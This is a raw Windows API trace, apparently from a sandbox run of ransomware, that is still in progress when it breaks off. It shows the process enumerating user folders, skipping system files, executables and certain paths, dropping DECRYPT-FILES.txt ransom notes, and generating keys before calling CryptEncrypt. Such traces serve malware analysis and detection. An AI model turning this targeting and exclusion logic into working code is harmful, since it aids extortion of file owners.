[0180.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0180.903] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.903] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\\\DECRYPT-FILES.txt") returned 84 [0180.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0180.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*" [0180.903] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeef2b4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef2b4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.903] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.903] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeef2b4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef2b4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.903] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.903] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.903] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef2b4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef2b4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef2b4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.903] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.903] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.903] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.903] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.903] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.903] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.904] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.904] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.904] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.904] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.904] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.904] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.904] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.904] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.904] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.904] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0180.904] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.904] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" [0180.904] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\0a16c9.tmp" [0180.904] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.904] CloseHandle (hObject=0x0) returned 0 [0180.904] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.904] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab0656e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab0656e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab0656e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.905] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.905] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5db2c650, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5db2c650, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xab08b840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x51a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm.uzvY", cAlternateFileName="NORMAL~1.UZV")) returned 1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="DECRYPT-FILES.txt") returned 1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="autorun.inf") returned 1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="boot.ini") returned 1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="desktop.ini") returned 1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="ntuser.dat") returned -1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="iconcache.db") returned 1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="bootsect.bak") returned 1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="ntuser.dat.log") returned -1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="thumbs.db") returned -1 [0180.905] lstrcmpiW (lpString1="Normal.dotm.uzvY", lpString2="Bootfont.bin") returned 1 [0180.905] lstrlenW (lpString="Normal.dotm.uzvY") returned 16 [0180.905] lstrcmpiW (lpString1="uzvY", lpString2="lnk") returned 1 [0180.905] lstrcmpiW (lpString1="uzvY", lpString2="exe") returned 1 [0180.905] lstrcmpiW (lpString1="uzvY", lpString2="sys") returned 1 [0180.905] lstrcmpiW (lpString1="uzvY", lpString2="dll") returned 1 [0180.905] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0180.905] lstrlenW (lpString="Normal.dotm.uzvY") returned 16 [0180.905] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" [0180.905] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Normal.dotm.uzvY" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.uzvY") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.uzvY" [0180.905] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.uzvY" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm.uzvy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0180.906] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=20899) returned 1 [0180.906] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0180.906] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.906] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.907] CloseHandle (hObject=0x278) returned 1 [0180.907] CloseHandle (hObject=0x274) returned 1 [0180.907] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.907] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5db2c650, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5db2c650, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xab08b840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x51a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm.uzvY", cAlternateFileName="NORMAL~1.UZV")) returned 0 [0180.907] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.907] CloseHandle (hObject=0x26c) returned 1 [0180.907] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xab1e24a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab1e24a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0180.907] lstrcmpW (lpString1="UProof", lpString2=".") returned 1 [0180.907] lstrcmpW (lpString1="UProof", lpString2="..") returned 1 [0180.907] lstrcatW (in: lpString1="UProof", lpString2="\\" | out: lpString1="UProof\\") returned="UProof\\" [0180.907] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="UProof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Program Files") returned 0x0 [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch=":\\Windows") returned 0x0 [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Games\\") returned 0x0 [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\All Users") returned 0x0 [0180.907] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="AhnLab") returned 0x0 [0180.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.908] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0180.908] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.908] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\\\0a16c9.tmp") returned 74 [0180.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.909] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0180.909] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.909] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\\\DECRYPT-FILES.txt") returned 81 [0180.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.909] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0180.909] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*" [0180.909] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeef51620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef51620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.909] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.909] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeef51620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef51620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.909] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.909] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.909] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef51620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef51620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef51620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.909] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.909] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.909] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.909] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.909] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.909] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.909] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.909] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.910] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.910] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.910] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.910] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.910] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.910] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.910] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.910] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0180.910] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.910] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" [0180.910] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\0a16c9.tmp" [0180.910] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.910] CloseHandle (hObject=0x0) returned 0 [0180.910] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.910] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbab2410, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xab1bc340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10a, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC.iKD45", cAlternateFileName="CUSTOM~1.IKD")) returned 1 [0180.910] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="DECRYPT-FILES.txt") returned -1 [0180.910] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="autorun.inf") returned 1 [0180.910] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="boot.ini") returned 1 [0180.910] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="desktop.ini") returned -1 [0180.911] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="ntuser.dat") returned -1 [0180.911] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="iconcache.db") returned -1 [0180.911] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="bootsect.bak") returned 1 [0180.911] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="ntuser.dat.log") returned -1 [0180.911] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="thumbs.db") returned -1 [0180.911] lstrcmpiW (lpString1="CUSTOM.DIC.iKD45", lpString2="Bootfont.bin") returned 1 [0180.911] lstrlenW (lpString="CUSTOM.DIC.iKD45") returned 16 [0180.911] lstrcmpiW (lpString1="iKD45", lpString2="lnk") returned -1 [0180.911] lstrcmpiW (lpString1="iKD45", lpString2="exe") returned 1 [0180.911] lstrcmpiW (lpString1="iKD45", lpString2="sys") returned -1 [0180.911] lstrcmpiW (lpString1="iKD45", lpString2="dll") returned 1 [0180.911] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0180.911] lstrlenW (lpString="CUSTOM.DIC.iKD45") returned 16 [0180.911] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" [0180.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="CUSTOM.DIC.iKD45" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.iKD45") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.iKD45" [0180.911] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.iKD45" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.ikd45"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0180.911] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=266) returned 1 [0180.912] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0180.912] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.912] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.912] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.912] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.912] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x100) returned 1 